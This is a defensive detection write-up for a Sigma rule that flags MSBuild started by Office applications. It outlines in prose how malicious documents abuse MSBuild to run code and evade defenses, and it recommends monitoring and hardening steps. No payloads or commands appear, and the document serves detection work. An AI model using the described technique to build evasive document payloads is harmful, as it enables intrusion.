Microsoft Build Engine Started by an Office Application

The Microsoft Build Engine (MSBuild) is a software build platform commonly used by Windows developers. When MSBuild is started by an Office application like Word or Excel, it deviates from typical usage patterns. This behavior can be indicative of a malicious document executing a script payload as part of a defense evasion tactic. Attackers may leverage MSBuild to execute code or perform actions that would otherwise be blocked or detected. This activity is particularly concerning because it can bypass traditional security measures that focus on blocking suspicious executables or scripts directly launched by Office applications. The rule was created in March 2020, and last updated in April 2026.

Attack Chain

1. A user opens a malicious Office document (e.g., Word, Excel, PowerPoint).
2. The Office document contains an embedded macro or exploit that triggers the execution of MSBuild.exe.
3. MSBuild.exe is launched as a child process of the Office application (e.g., winword.exe, excel.exe, powerpnt.exe).
4. MSBuild executes a project file or inline task specified in the command line. This can involve compiling code, executing scripts, or performing other actions.
5. The executed code or script performs malicious activities, such as downloading additional payloads, modifying system settings, or establishing persistence.
6. MSBuild may spawn child processes, such as cmd.exe, powershell.exe, or other utilities, to further execute malicious commands.
7. The attacker achieves their objective, which could include data exfiltration, installing malware, or gaining unauthorized access to the system.

Impact

Successful exploitation can lead to the execution of arbitrary code on the victim’s machine, potentially resulting in data theft, malware installation, or complete system compromise. Since MSBuild is a legitimate Microsoft tool, its use by malicious actors can make detection more challenging. The impact is high because it leverages a trusted process to carry out malicious activities, evading standard security measures.

Recommendation

• Deploy the Sigma rule “Microsoft Build Engine Started by an Office Application” to your SIEM to detect this specific behavior based on process creation events.
• Enable Sysmon process creation logging with the appropriate configuration to capture the necessary process start events for the Sigma rule to function correctly.
• Investigate any alerts generated by the Sigma rule, focusing on the command-line arguments of MSBuild.exe and the parent process information, including the executable name and command line.
• Monitor process execution events for MSBuild.exe with parent processes being Office applications as a high priority indicator of potential compromise.
• Review and harden Office macro settings to prevent execution of malicious macros.